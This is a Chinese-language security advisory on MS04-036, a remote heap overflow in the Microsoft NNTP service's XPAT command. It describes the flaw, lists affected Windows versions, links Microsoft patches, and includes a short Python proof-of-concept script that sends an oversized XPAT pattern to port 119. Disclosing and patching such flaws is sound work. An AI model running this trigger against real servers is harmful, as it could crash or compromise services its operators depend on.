安全研究

安全漏洞
Microsoft NNTP XPAT命令远程缓冲区溢出漏洞(MS04-036)

发布日期:2004-10-12
更新日期:2004-10-14

受影响系统:
Microsoft Windows NT 4.0SP6a
Microsoft Windows 2003
Microsoft Windows 2000SP4
Microsoft Windows 2000SP3
描述:
BUGTRAQ  ID: 11379
CVE(CAN) ID: CVE-2004-0574

Microsoft NNTP组件是用于对新闻组服务器支持。

Microsoft NNTP服务器对XPAT命令处理缺少正确的缓冲区边界检查,远程攻击者可以利用这个漏洞以进程权限在系统上执行任意指令。

XPAT命令用于接收指定文章中的特殊头字段信息,命令格式如下:

XPAT header range|<message-id> pat [pat...]

问题存在于XPAT处理用户提供的ASCII值并转换为2字节字符存放到缓冲区中。NNTP服务分配4000字节缓冲区用于存储转换XPAT查询的2字节字符格式,它使用初始化设置为'2000'值的全局计数器跟踪缓冲区还剩下多少字节,由于对变量的比较缺少正确处理,可导致产生基于off-by-two的堆溢出,精心构建提交数据可能以进程权限在系统上执行任意指令。

<*来源:Lucas Lavarello
        Juliano Rizzo
  
  链接:http://www.microsoft.com/technet/security/bulletin/MS04-036.mspx
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Lucas Lavarello 和 Juliano Rizzo 提供了如下测试方法:

#--
# IIS NNTP Service XPAT command heap overflow proof of concept
#
# Author:
#   Lucas Lavarello (lucas at coresecurity dot com)
#   Juliano Rizzo   (juliano at coresecurity dot com)
#
# Copyright (c) 2001-2004 CORE Security Technologies, CORE SDI Inc.
# All rights reserved.
#
# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE
# FOR ANY DIRECT,  INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR
# CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF
# THIS SOFTWARE
#
# http://www.coresecurity.com
#--

from socket import *

host = "127.0.0.1"
pat = "C"*1946  + " " + "X"*10

newsgroup = "control.newgroup"

sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host, 119))

print sock.recv(512)

sock.send("group %s\x0d\x0a" % newsgroup)

print sock.recv(512)

sock.send("xpat From 1-9 %s \x0d\x0a" % pat)

建议:
厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS04-036)以及相应补丁:
MS04-036:Vulnerability in NNTP Could Allow Remote Code Execution (883935)
链接:http://www.microsoft.com/technet/security/bulletin/MS04-036.mspx

补丁下载:

Microsoft Windows NT Server 4.0 Service Pack 6a

http://www.microsoft.com/downloads/details.aspx?FamilyId=0126B7AC-9C78-45C5-8AC7-E0E8CA4B6DEE

Microsoft Windows 2000 Server Service Pack 3 and Microsoft Windows 2000 Server Service Pack 4

http://www.microsoft.com/downloads/details.aspx?FamilyId=54A86560-4A0C-4E2F-A137-D8EE905A674A

Microsoft Windows Server? 2003

http://www.microsoft.com/downloads/details.aspx?FamilyId=DCB1CB73-A426-40D8-BD14-B458C7915815

Microsoft Windows Server 2003 64-Bit Edition

http://www.microsoft.com/downloads/details.aspx?FamilyId=1A8C4D7A-2F85-4CDD-8CC9-E2E1817403DF

浏览次数:3672
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障